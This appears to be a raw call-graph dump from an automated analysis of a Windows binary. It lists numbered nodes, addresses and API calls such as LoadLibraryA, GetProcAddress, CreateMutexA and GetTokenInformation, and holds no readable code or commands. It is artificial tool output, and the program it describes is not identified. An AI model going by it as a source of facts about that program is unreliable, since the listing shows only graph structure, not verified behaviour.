99098 11140f70 std::_Mutex::_Mutex 265 API calls 99097->99098 99101 111411d4 99098->99101 99099 1113e630 std::_Mutex::_Mutex 265 API calls 99102 11141228 99099->99102 99100->99101 99104 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 99101->99104 99103 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 99102->99103 99105 1102e4c8 99103->99105 99104->99106 99105->98767 99106->99099 99108 1105d350 79 API calls 99107->99108 99109 110623c8 99108->99109 99713 110612d0 99109->99713 99111 1102e501 99111->98771 99111->98775 99113 1105d480 5 API calls 99114 11062429 std::_Mutex::_Mutex 99113->99114 99115 1105d350 79 API calls 99114->99115 99123 11060590 274 API calls 99122->99123 99124 11027104 99123->99124 99125 1105d350 79 API calls 99124->99125 99128 11027119 99125->99128 99126 110271e8 99132 1102729c 99126->99132 99140 11080cc0 86 API calls 99126->99140 99141 11141440 std::_Mutex::_Mutex 90 API calls 99126->99141 100020 11060930 268 API calls 4 library calls 99126->100020 99127 1102716f LoadIconA 99130 11027181 99127->99130 99131 1102718a GetSystemMetrics GetSystemMetrics LoadImageA 99127->99131 99128->99126 99128->99127 99129 111416c0 std::_Mutex::_Mutex 90 API calls 99128->99129 99134 11027152 LoadLibraryExA 99129->99134 99130->99131 99135 110271c3 99131->99135 99136 110271af LoadIconA 99131->99136 99133 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 99132->99133 99138 110272a9 99133->99138 99134->99127 99134->99136 99135->99126 99137 110271c7 GetSystemMetrics GetSystemMetrics LoadImageA 99135->99137 99136->99135 99137->99126 99138->98777 99140->99126 99141->99126 99143 11142790 std::_Mutex::_Mutex 21 API calls 99142->99143 99144 11027e06 99143->99144 99145 11027ef4 99144->99145 99146 11027e1d GetModuleFileNameA 99144->99146 100021 110139f0 22 API calls 2 library calls 99145->100021 99148 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 99146->99148 99150 11027e41 99148->99150 99149 11027f07 99679->98751 99680->98752 99834 11141240 99713->99834 99715 1106135c 99716 110cf110 268 API calls 99715->99716 99717 11061370 99716->99717 99718 11061557 99717->99718 99769 11061384 std::ios_base::_Ios_base_dtor 99717->99769 99843 11160b2d 99717->99843 99720 11160b2d _fgets 81 API calls 99718->99720 99719 110622c8 99721 110ce380 265 API calls 99719->99721 99724 11061571 99720->99724 99821 11061451 std::ios_base::_Ios_base_dtor 99721->99821 99723 11160445 std::_Mutex::_Mutex 102 API calls 99723->99719 99728 110615d7 _strpbrk 99724->99728 99729 11061578 99724->99729 99725 11061407 99726 1106140e 99725->99726 99740 1106145d _strpbrk std::_Mutex::_Mutex 99725->99740 99727 11061443 99726->99727 99731 11160445 std::_Mutex::_Mutex 102 API calls 99726->99731 99732 110ce380 265 API calls 99727->99732 99862 1115fd56 99728->99862 99730 110615bd 99729->99730 99735 11160445 std::_Mutex::_Mutex 102 API calls 99729->99735 99736 110ce380 265 API calls 99730->99736 99731->99727 99732->99821 99734 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 99738 110622ff 99734->99738 99735->99730 99736->99821 99738->99111 99738->99113 99738->99114 99741 1115f4c7 std::_Mutex::_Mutex 79 API calls 99740->99741 99742 110614cd 99741->99742 99769->99719 99769->99723 99821->99734 99837 11141253 std::ios_base::_Ios_base_dtor 99834->99837 99835 11141160 267 API calls 99835->99837 99836 1116067b std::_Mutex::_Mutex 143 API calls 99836->99837 99837->99835 99837->99836 99838 111412ba std::ios_base::_Ios_base_dtor 99837->99838 99839 11141275 GetLastError 99837->99839 99838->99715 99839->99837 99840 11141280 Sleep 99839->99840 99841 1116067b std::_Mutex::_Mutex 143 API calls 99840->99841 99842 11141292 99841->99842 99842->99837 99842->99838 99844 11160b39 __setmbcp 99843->99844 99845 11160b4c 99844->99845 99847 11160b7d 99844->99847 99931 111659cf 66 API calls __getptd_noexit 99845->99931 99850 11167679 __lock_file 67 API calls 99847->99850 99855 11160b5c __setmbcp 99847->99855 99848 11160b51 99932 1116a5e4 11 API calls __mbsupr_s_l 99848->99932 99851 11160b8b 99850->99851 99853 11165967 __flsbuf 66 API calls 99851->99853 99857 11160c01 99851->99857 99852 11160c2e 99935 11160c5d LeaveCriticalSection LeaveCriticalSection _fgets 99852->99935 99858 11160b9c 99853->99858 99855->99725 99857->99852 99911 1116e0d5 99857->99911 99858->99857 99933 111659cf 66 API calls __getptd_noexit 99858->99933 99863 1115fd6f 99862->99863 99864 1115fb00 strtoxl 79 API calls 99863->99864 99865 11061601 99864->99865 99912 1116e0e2 99911->99912 99916 1116e0f7 99911->99916 99931->99848 99932->99855 99935->99855 100020->99126 100021->99149 101573 11139580 101574 11139589 101573->101574 101575 1113958e 101573->101575 101577 111365d0 101574->101577 101578 11136612 101577->101578 101579 11136607 GetCurrentThreadId 101577->101579 101580 11136620 101578->101580 101859 11028fa0 269 API calls 101578->101859 101579->101578 101711 11130e10 101580->101711 101586 11136711 101590 11136742 FindWindowA 101586->101590 101596 111367da 101586->101596 101587 11136c9a 101588 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 101587->101588 101591 11136cb2 101588->101591 101593 11136757 IsWindowVisible 101590->101593 101590->101596 101591->101575 101592 1113665c IsWindow IsWindowVisible 101594 11142790 std::_Mutex::_Mutex 21 API calls 101592->101594 101595 1113675e 101593->101595 101593->101596 101597 11136687 101594->101597 101595->101596 101602 11136170 378 API calls 101595->101602 101598 1105d350 79 API calls 101596->101598 101609 111367ff 101596->101609 101600 1105d350 79 API calls 101597->101600 101622 11136827 101598->101622 101599 111369b0 101601 111369ca 101599->101601 101606 11136170 378 API calls 101599->101606 101604 111366a3 IsWindowVisible 101600->101604 101608 111369e7 101601->101608 101945 1106aec0 298 API calls 101601->101945 101607 1113677f IsWindowVisible 101602->101607 101603 1105d350 79 API calls 101610 1113699f 101603->101610 101604->101586 101605 111366b1 101604->101605 101605->101586 101611 111366b9 101605->101611 101606->101601 101607->101596 101612 1113678e IsIconic 101607->101612 101946 1112a060 12 API calls 2 library calls 101608->101946 101609->101599 101609->101603 101610->101599 101615 111369a4 101610->101615 101616 11142790 std::_Mutex::_Mutex 21 API calls 101611->101616 101612->101596 101617 1113679f GetForegroundWindow 101612->101617 101944 1102cbe0 294 API calls std::_Mutex::_Mutex 101615->101944 101620 111366c3 GetForegroundWindow 101616->101620 101942 1112e440 147 API calls 101617->101942 101618 111369ec 101623 111369f4 101618->101623 101624 111369fd 101618->101624 101626 111366d2 EnableWindow 101620->101626 101637 111366fe 101620->101637 101622->101609 101628 11080b80 IsDBCSLeadByte 101622->101628 101639 11136874 101622->101639 101947 1112ed30 89 API calls 3 library calls 101623->101947 101631 11136a14 101624->101631 101632 11136a08 101624->101632 101625 111369ab 101625->101599 101940 1112e440 147 API calls 101626->101940 101627 111367ae 101943 1112e440 147 API calls 101627->101943 101628->101639 101630 1113f5d0 std::_Mutex::_Mutex 8 API calls 101633 11136886 101630->101633 101949 1112e9d0 299 API calls std::_Mutex::_Mutex 101631->101949 101634 11136a19 101632->101634 101948 1112eaa0 299 API calls std::_Mutex::_Mutex 101632->101948 101641 11136893 GetLastError 101633->101641 101659 111368a1 101633->101659 101643 11136a12 101634->101643 101644 11136b29 101634->101644 101637->101586 101646 1113670a SetForegroundWindow 101637->101646 101639->101630 101640 111369fa 101640->101624 101648 11142790 std::_Mutex::_Mutex 21 API calls 101641->101648 101643->101634 101649 11136a31 101643->101649 101650 11136adb 101643->101650 101652 11135d30 295 API calls 101644->101652 101645 111366e9 101941 1112e440 147 API calls 101645->101941 101646->101586 101647 111367b5 101653 111367cb EnableWindow 101647->101653 101655 111367c4 SetForegroundWindow 101647->101655 101648->101659 101649->101644 101661 1110c4b0 std::_Mutex::_Mutex 265 API calls 101649->101661 101650->101644 101957 1103e7c0 68 API calls 101650->101957 101666 11136b2e 101652->101666 101653->101596 101654 111366f0 EnableWindow 101654->101637 101655->101653 101657 11136b55 101668 1105d350 79 API calls 101657->101668 101710 11136c7a std::ios_base::_Ios_base_dtor 101657->101710 101658 11136aea 101958 1103e800 68 API calls 101658->101958 101659->101609 101660 111368f2 101659->101660 101663 11080b80 IsDBCSLeadByte 101659->101663 101665 1113f5d0 std::_Mutex::_Mutex 8 API calls 101660->101665 101664 11136a52 101661->101664 101663->101660 101669 11136a73 101664->101669 101950 11056a30 308 API calls std::_Mutex::_Mutex 101664->101950 101670 11136904 101665->101670 101666->101657 101855 1113e5b0 101666->101855 101667 11136af5 101959 1103e820 68 API calls 101667->101959 101684 11136b85 101668->101684 101951 1110c2f0 InterlockedIncrement 101669->101951 101670->101609 101674 1113690b GetLastError 101670->101674 101675 11142790 std::_Mutex::_Mutex 21 API calls 101674->101675 101675->101609 101677 11136b00 101960 1103e7e0 68 API calls 101677->101960 101678 11136a98 101952 1104c410 1012 API calls 101678->101952 101681 11136b0b 101961 1110c300 InterlockedDecrement 101681->101961 101682 11136aa3 101953 1104d940 1012 API calls 101682->101953 101685 11136bcd 101684->101685 101688 11136baa 101684->101688 101689 11136bd9 GetTickCount 101684->101689 101684->101710 101685->101689 101685->101710 101687 11136ad9 101687->101644 101692 11142790 std::_Mutex::_Mutex 21 API calls 101688->101692 101690 11136beb 101689->101690 101689->101710 101693 1113f220 145 API calls 101690->101693 101691 11136aae 101954 1104d9b0 1012 API calls 101691->101954 101695 11136bb5 GetTickCount 101692->101695 101696 11136bf7 101693->101696 101695->101710 101698 11143220 269 API calls 101696->101698 101697 11136ab9 101955 1104c450 1012 API calls 101697->101955 101700 11136c02 101698->101700 101702 1113f220 145 API calls 101700->101702 101701 11136ac4 101701->101644 101956 110e9c60 285 API calls 101701->101956 101703 11136c15 101702->101703 101962 11025850 LoadLibraryA 101703->101962 101706 11136c22 101706->101706 101963 11129970 GetProcAddress SetLastError 101706->101963 101708 11136c69 101709 11136c73 FreeLibrary 101708->101709 101708->101710 101709->101710 101710->101587 101712 11130e52 101711->101712 101713 11131174 101711->101713 101714 1105d350 79 API calls 101712->101714 101715 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 101713->101715 101716 11130e72 101714->101716 101717 1113118c 101715->101717 101716->101713 101718 11130e7a GetLocalTime 101716->101718 101756 111308f0 101717->101756 101719 11130eb1 LoadLibraryA 101718->101719 101720 11130e90 101718->101720 101964 11009890 LoadLibraryA 101719->101964 101721 11142790 std::_Mutex::_Mutex 21 API calls 101720->101721 101723 11130ea5 101721->101723 101723->101719 101724 11130f05 101965 11015e40 LoadLibraryA 101724->101965 101726 11130f10 GetCurrentProcess 101727 11130f35 GetProcAddress 101726->101727 101728 11130f4d 101726->101728 101727->101728 101729 11130f56 SetLastError 101727->101729 101730 11130f82 101728->101730 101731 11130f68 GetProcAddress 101728->101731 101729->101728 101733 11130f90 GetProcAddress 101730->101733 101734 11130faa 101730->101734 101731->101730 101732 11130fb7 SetLastError 101731->101732 101732->101733 101733->101734 101735 11130fc4 SetLastError 101733->101735 101736 11130fcf GetProcAddress 101734->101736 101735->101736 101737 11130fef SetLastError 101736->101737 101738 11130fe1 101736->101738 101737->101738 101739 11142790 std::_Mutex::_Mutex 21 API calls 101738->101739 101741 1113106d 101738->101741 101739->101741 101740 1113114a 101742 1113115a FreeLibrary 101740->101742 101743 1113115d 101740->101743 101741->101740 101747 1105d350 79 API calls 101741->101747 101742->101743 101744 11131167 FreeLibrary 101743->101744 101745 1113116a 101743->101745 101744->101745 101745->101713 101746 11131171 FreeLibrary 101745->101746 101746->101713 101748 111310be 101747->101748 101749 1105d350 79 API calls 101748->101749 101750 111310e6 101749->101750 101751 1105d350 79 API calls 101750->101751 101752 1113110d 101751->101752 101753 1105d350 79 API calls 101752->101753 101754 11131134 101753->101754 101754->101740 101966 11027390 265 API calls 2 library calls 101754->101966 101758 1113091d 101756->101758 101757 11130dd9 101757->101586 101757->101587 101860 11136170 101757->101860 101758->101757 101759 110cf110 268 API calls 101758->101759 101760 1113097e 101759->101760 101761 110cf110 268 API calls 101760->101761 101762 11130989 101761->101762 101763 111309b7 101762->101763 101764 111309ce 101762->101764 101967 110290c0 265 API calls 2 library calls 101763->101967 101765 11142790 std::_Mutex::_Mutex 21 API calls 101764->101765 101767 111309dc 101765->101767 101968 110ceea0 265 API calls 101767->101968 101856 1113e5cf 101855->101856 101857 1113e5ba 101855->101857 101856->101657 101969 1113dc30 101857->101969 101859->101580 101861 111365af 101860->101861 101864 1113618d 101860->101864 101862 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 101861->101862 101863 111365be 101862->101863 101863->101592 101864->101861 101865 11141440 std::_Mutex::_Mutex 90 API calls 101864->101865 101866 111361cc 101865->101866 101866->101861 101867 1105d350 79 API calls 101866->101867 101868 111361fb 101867->101868 102099 11129af0 101868->102099 101870 11136340 PostMessageA 101872 11136355 101870->101872 101871 1105d350 79 API calls 101873 1113633c 101871->101873 101874 11136365 101872->101874 102108 1110c300 InterlockedDecrement 101872->102108 101873->101870 101873->101872 101876 1113636b 101874->101876 101877 1113638d 101874->101877 101880 111363c3 std::ios_base::_Ios_base_dtor 101876->101880 101881 111363de 101876->101881 102109 1112d640 301 API calls std::_Mutex::_Mutex 101877->102109 101879 11136395 102110 11143200 267 API calls 101879->102110 101889 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 101880->101889 101884 1113f220 145 API calls 101881->101884 101885 111363e3 101884->101885 101887 11143220 269 API calls 101885->101887 101886 1113639f 102111 11129cf0 SetDlgItemTextA 101886->102111 101890 111363ea SetWindowTextA 101887->101890 101892 111363da 101889->101892 101893 11136406 101890->101893 101901 1113640d std::ios_base::_Ios_base_dtor 101890->101901 101891 111363b0 std::ios_base::_Ios_base_dtor 101891->101876 101892->101592 102112 11132790 299 API calls 5 library calls 101893->102112 101894 11141e80 271 API calls 101896 111362eb 101894->101896 101896->101870 101896->101871 101897 11136464 101898 11136478 101897->101898 101899 1113653c 101897->101899 101903 1113649c 101898->101903 102115 11132790 299 API calls 5 library calls 101898->102115 101905 1113655d 101899->101905 101906 1113654b 101899->101906 101907 11136544 101899->101907 101900 11136437 101900->101897 101902 1113644c 101900->101902 101901->101897 101901->101900 102113 11132790 299 API calls 5 library calls 101901->102113 102114 1112e440 147 API calls 101902->102114 102117 110f6140 86 API calls 101903->102117 102121 110f6140 86 API calls 101905->102121 102120 1112e440 147 API calls 101906->102120 102119 11132790 299 API calls 5 library calls 101907->102119 101912 1113645c 101912->101897 101915 11136568 101915->101861 101920 1113656c IsWindowVisible 101915->101920 101916 111364a7 101916->101861 101917 111364af IsWindowVisible 101916->101917 101917->101861 101921 111364c6 101917->101921 101918 1113655a 101918->101905 101919 11136486 101919->101903 101922 11136492 101919->101922 101920->101861 101923 1113657e IsWindowVisible 101920->101923 101924 11141440 std::_Mutex::_Mutex 90 API calls 101921->101924 102116 1112e440 147 API calls 101922->102116 101923->101861 101926 1113658b EnableWindow 101923->101926 101927 111364d1 101924->101927 102122 1112e440 147 API calls 101926->102122 101927->101861 101930 111364dc GetForegroundWindow IsWindowVisible 101927->101930 101928 11136499 101928->101903 101932 11136501 101930->101932 101933 111364f6 EnableWindow 101930->101933 101931 111365a2 EnableWindow 101931->101861 102118 1112e440 147 API calls 101932->102118 101933->101932 101935 11136508 101936 1113651e EnableWindow 101935->101936 101937 11136517 SetForegroundWindow 101935->101937 101938 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 101936->101938 101937->101936 101939 11136538 101938->101939 101939->101592 101940->101645 101941->101654 101942->101627 101943->101647 101944->101625 101945->101608 101946->101618 101947->101640 101948->101643 101949->101634 101950->101669 101951->101678 101952->101682 101953->101691 101954->101697 101955->101701 101956->101687 101957->101658 101958->101667 101959->101677 101960->101681 101961->101687 101962->101706 101963->101708 101964->101724 101965->101726 101966->101740 101970 1113dc6f 101969->101970 102021 1113dc68 std::ios_base::_Ios_base_dtor 101969->102021 101971 1110c4b0 std::_Mutex::_Mutex 265 API calls 101970->101971 101973 1113dc76 101971->101973 101972 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 101974 1113e5aa 101972->101974 101975 1113dca6 101973->101975 101976 110605c0 301 API calls 101973->101976 101974->101856 101977 11060d40 275 API calls 101975->101977 101976->101975 101978 1113dce2 101977->101978 101979 1113dce9 RegCloseKey 101978->101979 101980 1113dcf0 std::_Mutex::_Mutex 101978->101980 101979->101980 101981 11141160 267 API calls 101980->101981 101982 1113dd0c 101981->101982 101983 1113f5d0 std::_Mutex::_Mutex 8 API calls 101982->101983 101984 1113dd20 101983->101984 101985 1113dd37 101984->101985 101986 110623a0 330 API calls 101984->101986 101987 1110c4b0 std::_Mutex::_Mutex 265 API calls 101985->101987 101986->101985 101988 1113dd3e 101987->101988 101989 1113dd5a 101988->101989 101990 11060230 293 API calls 101988->101990 101991 1110c4b0 std::_Mutex::_Mutex 265 API calls 101989->101991 101990->101989 101992 1113dd73 101991->101992 101993 1113dd8f 101992->101993 101994 11060230 293 API calls 101992->101994 101995 1110c4b0 std::_Mutex::_Mutex 265 API calls 101993->101995 101994->101993 101996 1113dda8 101995->101996 101997 1113ddc4 101996->101997 101998 11060230 293 API calls 101996->101998 101999 1105fdb0 268 API calls 101997->101999 101998->101997 102000 1113dded 101999->102000 102001 1105fdb0 268 API calls 102000->102001 102019 1113de07 102001->102019 102002 1113e135 102004 110cf110 268 API calls 102002->102004 102005 1113e519 102002->102005 102003 1105fe40 274 API calls 102003->102019 102006 1113e153 102004->102006 102013 1105fc90 69 API calls 102005->102013 102011 1105d350 79 API calls 102006->102011 102007 1113e125 102008 11142790 std::_Mutex::_Mutex 21 API calls 102007->102008 102008->102002 102009 11080cc0 86 API calls 102009->102019 102010 11142790 21 API calls std::_Mutex::_Mutex 102010->102019 102012 1113e190 102011->102012 102015 1113e2dd 102012->102015 102016 1105fdb0 268 API calls 102012->102016 102014 1113e572 102013->102014 102017 1105fc90 69 API calls 102014->102017 102018 11060590 274 API calls 102015->102018 102020 1113e1ae 102016->102020 102017->102021 102022 1113e2f9 102018->102022 102019->102002 102019->102003 102019->102007 102019->102009 102019->102010 102024 1112ec20 86 API calls 102019->102024 102046 11080d70 86 API calls std::_Mutex::_Mutex 102019->102046 102023 1105fe40 274 API calls 102020->102023 102021->101972 102094 11067020 298 API calls std::_Mutex::_Mutex 102022->102094 102036 1113e1bd 102023->102036 102024->102019 102025 1113e1f2 102028 1105fdb0 268 API calls 102025->102028 102027 11142790 std::_Mutex::_Mutex 21 API calls 102027->102036 102030 1113e208 102028->102030 102029 1113e323 102031 1113e353 EnterCriticalSection 102029->102031 102040 1113e327 102029->102040 102034 1105fe40 274 API calls 102030->102034 102032 1105fa70 271 API calls 102031->102032 102035 1113e370 102032->102035 102033 1105fe40 274 API calls 102033->102036 102047 1113e218 102034->102047 102038 11060590 274 API calls 102035->102038 102036->102025 102036->102027 102036->102033 102042 1113e386 102038->102042 102039 1113e251 102041 1105fdb0 268 API calls 102039->102041 102040->102031 102095 1104ff40 354 API calls 4 library calls 102040->102095 102096 11067020 298 API calls std::_Mutex::_Mutex 102040->102096 102044 1113e267 102041->102044 102045 1113e39a LeaveCriticalSection 102042->102045 102050 1102a5f0 283 API calls 102042->102050 102043 11142790 std::_Mutex::_Mutex 21 API calls 102043->102047 102049 1105fe40 274 API calls 102044->102049 102051 1113e3ee 102045->102051 102052 1113e3ae 102045->102052 102046->102019 102047->102039 102047->102043 102053 1105fe40 274 API calls 102047->102053 102066 1113e276 102049->102066 102054 1113e397 102050->102054 102055 111308f0 273 API calls 102051->102055 102052->102051 102056 11142790 std::_Mutex::_Mutex 21 API calls 102052->102056 102053->102047 102054->102045 102058 1113e3f8 102055->102058 102060 1113e3bc 102056->102060 102094->102029 102095->102040 102096->102040 102100 11129b0c 102099->102100 102101 11129b47 102100->102101 102103 11129b34 102100->102103 102123 1106aec0 298 API calls 102101->102123 102105 11143220 269 API calls 102103->102105 102104 11129b3f 102106 11129b93 102104->102106 102107 1113e630 std::_Mutex::_Mutex 265 API calls 102104->102107 102105->102104 102106->101894 102106->101896 102107->102106 102108->101874 102109->101879 102110->101886 102111->101891 102112->101901 102113->101900 102114->101912 102115->101919 102116->101928 102117->101916 102118->101935 102119->101906 102120->101918 102121->101915 102122->101931 102123->102104 102124 1103fff0 102125 11040022 102124->102125 102126 11040028 102125->102126 102133 11040044 102125->102133 102127 110f86a0 15 API calls 102126->102127 102129 1104003a CloseHandle 102127->102129 102128 11040158 102130 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 102128->102130 102129->102133 102132 11040165 102130->102132 102131 110400d8 102146 110f86a0 GetTokenInformation 102131->102146 102133->102128 102137 1104007d 102133->102137 102156 11086fe0 297 API calls 5 library calls 102133->102156 102136 110400ea 102138 110400f2 CloseHandle 102136->102138 102142 110400f9 102136->102142 102137->102128 102137->102131 102138->102142 102139 1104013b 102140 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 102139->102140 102144 11040154 102140->102144 102141 11040121 102143 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 102141->102143 102142->102139 102142->102141 102145 11040137 102143->102145 102147 110f86e8 102146->102147 102148 110f86d7 102146->102148 102157 110efbd0 9 API calls 102147->102157 102149 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 102148->102149 102151 110f86e4 102149->102151 102151->102136 102152 110f870c 102152->102148 102153 110f8714 102152->102153 102154 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 102153->102154 102155 110f873a 102154->102155 102155->102136 102156->102137 102157->102152 102158 11030a50 102159 11030a5e 102158->102159 102160 111421c0 268 API calls 102159->102160 102161 11030a6f SetUnhandledExceptionFilter 102160->102161 102162 11030a7f std::_Mutex::_Mutex 102161->102162 102163 111405a0 102164 111405b1 102163->102164 102177 1113ffc0 102164->102177 102168 11140635 102170 11140652 102168->102170 102172 11140634 102168->102172 102169 111405fb 102171 11140602 ResetEvent 102169->102171 102185 11140180 265 API calls 2 library calls 102171->102185 102172->102168 102186 11140180 265 API calls 2 library calls 102172->102186 102175 11140616 SetEvent WaitForMultipleObjects 102175->102171 102175->102172 102176 1114064f 102176->102170 102178 1113ffef 102177->102178 102179 1113ffcc GetCurrentProcess 102177->102179 102181 1110c4b0 std::_Mutex::_Mutex 263 API calls 102178->102181 102184 11140019 WaitForMultipleObjects 102178->102184 102179->102178 102180 1113ffdd GetModuleFileNameA 102179->102180 102180->102178 102182 1114000b 102181->102182 102182->102184 102187 1113f910 GetModuleFileNameA 102182->102187 102184->102168 102184->102169 102185->102175 102186->102176 102188 1113f993 102187->102188 102189 1113f953 102187->102189 102192 1113f9b9 GetModuleHandleA GetProcAddress 102188->102192 102193 1113f99f LoadLibraryA 102188->102193 102190 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 102189->102190 102191 1113f961 102190->102191 102191->102188 102194 1113f968 LoadLibraryA 102191->102194 102196 1113f9e7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 102192->102196 102197 1113f9d9 102192->102197 102193->102192 102195 1113f9ae LoadLibraryA 102193->102195 102194->102188 102195->102192 102198 1113fa13 10 API calls 102196->102198 102197->102198 102199 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 102198->102199 102200 1113fa90 102199->102200 102200->102184 102201 1102fe74 102202 1113ee00 267 API calls 102201->102202 102203 1102fe82 102202->102203 102204 1113ef50 86 API calls 102203->102204 102205 1102fec5 102204->102205 102206 1102feda 102205->102206 102207 11080cc0 86 API calls 102205->102207 102208 110eae40 8 API calls 102206->102208 102207->102206 102209 1102ff05 102208->102209 102210 1102ff4c 102209->102210 102254 110eaef0 81 API calls 2 library calls 102209->102254 102213 1113ef50 86 API calls 102210->102213 102212 1102ff1a 102255 110eaef0 81 API calls 2 library calls 102212->102255 102215 1102ff61 102213->102215 102217 1110c4b0 std::_Mutex::_Mutex 265 API calls 102215->102217 102216 1102ff30 102216->102210 102218 11142710 19 API calls 102216->102218 102219 1102ff70 102217->102219 102218->102210 102220 1102ff91 102219->102220 102221 11087960 268 API calls 102219->102221 102222 11089560 267 API calls 102220->102222 102221->102220 102223 1102ffa4 OpenMutexA 102222->102223 102224 1102ffc3 CreateMutexA 102223->102224 102225 110300ac CloseHandle 102223->102225 102226 1102ffe5 102224->102226 102247 11089660 102225->102247 102228 1110c4b0 std::_Mutex::_Mutex 265 API calls 102226->102228 102229 1102fffa 102228->102229 102231 1103001d 102229->102231 102233 11060230 293 API calls 102229->102233 102230 110300c2 102232 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 102230->102232 102256 11015e40 LoadLibraryA 102231->102256 102234 11030a3f 102232->102234 102233->102231 102236 1103002f 102237 11030043 GetProcAddress 102236->102237 102238 11030059 102236->102238 102237->102238 102239 1103005d SetLastError 102237->102239 102240 11027de0 47 API calls 102238->102240 102239->102238 102241 1103006a 102240->102241 102257 110092c0 429 API calls std::_Mutex::_Mutex 102241->102257 102243 11030079 102244 11030082 WaitForSingleObject 102243->102244 102244->102244 102245 11030094 CloseHandle 102244->102245 102245->102225 102246 110300a5 FreeLibrary 102245->102246 102246->102225 102248 11089707 102247->102248 102252 1108969a std::ios_base::_Ios_base_dtor 102247->102252 102249 1108970e DeleteCriticalSection 102248->102249 102258 111579b0 102249->102258 102250 110896ae CloseHandle 102250->102252 102252->102248 102252->102250 102253 11089734 std::ios_base::_Ios_base_dtor 102253->102230 102254->102212 102255->102216 102256->102236 102257->102243 102261 111579c4 102258->102261 102259 111579c8 102259->102253 102261->102259 102261->102261 102262 111576b0 67 API calls 2 library calls 102261->102262 102262->102261 102263 11088b10 102264 1110c770 ___DllMainCRTStartup 4 API calls 102263->102264 102265 11088b23 102264->102265 102266 11088b2d 102265->102266 102275 11088250 268 API calls std::_Mutex::_Mutex 102265->102275 102268 11088b54 102266->102268 102276 11088250 268 API calls std::_Mutex::_Mutex 102266->102276 102271 11088b63 102268->102271 102272 11088ae0 102268->102272 102277 11088770 102272->102277 102275->102266 102276->102268 102318 11087a70 6 API calls ___DllMainCRTStartup 102277->102318 102279 110887a9 GetParent 102280 110887bc 102279->102280 102281 110887cd 102279->102281 102282 110887c0 GetParent 102280->102282 102283 11141160 267 API calls 102281->102283 102282->102281 102282->102282 102284 110887d9 102283->102284 102285 1116067b std::_Mutex::_Mutex 143 API calls 102284->102285 102286 110887e6 std::ios_base::_Ios_base_dtor 102285->102286 102287 11141160 267 API calls 102286->102287 102288 110887ff 102287->102288 102319 110139f0 22 API calls 2 library calls 102288->102319 102290 1108881a 102291 1113f5d0 std::_Mutex::_Mutex 8 API calls 102290->102291 102293 1108885a std::ios_base::_Ios_base_dtor 102291->102293 102292 11088875 102294 11160445 std::_Mutex::_Mutex 102 API calls 102292->102294 102296 11088893 std::_Mutex::_Mutex 102292->102296 102293->102292 102295 1113e630 std::_Mutex::_Mutex 265 API calls 102293->102295 102294->102296 102295->102292 102297 11088944 std::ios_base::_Ios_base_dtor 102296->102297 102298 1102a220 std::_Mutex::_Mutex 145 API calls 102296->102298 102299 1115e3e1 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 102297->102299 102301 110888e3 102298->102301 102300 11088a32 102299->102300 102300->102271 102302 1113e630 std::_Mutex::_Mutex 265 API calls 102301->102302 102303 110888eb 102302->102303 102304 11080c50 std::_Mutex::_Mutex IsDBCSLeadByte 102303->102304 102305 11088902 102304->102305 102305->102297 102306 11080cc0 86 API calls 102305->102306 102307 1108891a 102306->102307 102308 1108895e 102307->102308 102309 11088921 102307->102309 102310 11080cc0 86 API calls 102308->102310 102320 110b6660 102309->102320 102312 11088969 102310->102312 102312->102297 102315 110b6660 68 API calls 102312->102315 102314 110b6660 68 API calls 102314->102297 102316 11088976 102315->102316 102316->102297 102317 110b6660 68 API calls 102316->102317 102317->102297 102318->102279 102319->102290 102323 110b6640 102320->102323 102326 111639c3 102323->102326 102329 11163944 102326->102329 102330 11163951 102329->102330 102331 1116396b 102329->102331 102347 111659e2 66 API calls __getptd_noexit 102330->102347 102331->102330 102332 11163974 GetFileAttributesA 102331->102332 102335 11163982 GetLastError 102332->102335 102341 11163998 102332->102341 102334 11163956 102348 111659cf 66 API calls __getptd_noexit 102334->102348 102350 111659f5 66 API calls 3 library calls 102335->102350 102338 11088927 102338->102297 102338->102314 102339 1116395d 102349 1116a5e4 11 API calls __mbsupr_s_l 102339->102349 102340 1116398e 102351 111659cf 66 API calls __getptd_noexit 102340->102351 102341->102338 102352 111659e2 66 API calls __getptd_noexit 102341->102352 102345 111639ab 102353 111659cf 66 API calls __getptd_noexit 102345->102353 102347->102334 102348->102339 102349->102338 102350->102340 102351->102338 102352->102345 102353->102340 102354 11165ded 102355 11165dfd 102354->102355 102356 11165df8 102354->102356 102360 11165cf7 102355->102360 102372 11173758 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 102356->102372 102359 11165e0b 102361 11165d03 __setmbcp 102360->102361 102365 11165d50 102361->102365 102370 11165da0 __setmbcp 102361->102370 102373 11165b93 102361->102373 102364 11165d63 102366 11165d80 102364->102366 102367 11025ad0 ___DllMainCRTStartup 7 API calls 102364->102367 102365->102370 102423 11025ad0 102365->102423 102368 11165b93 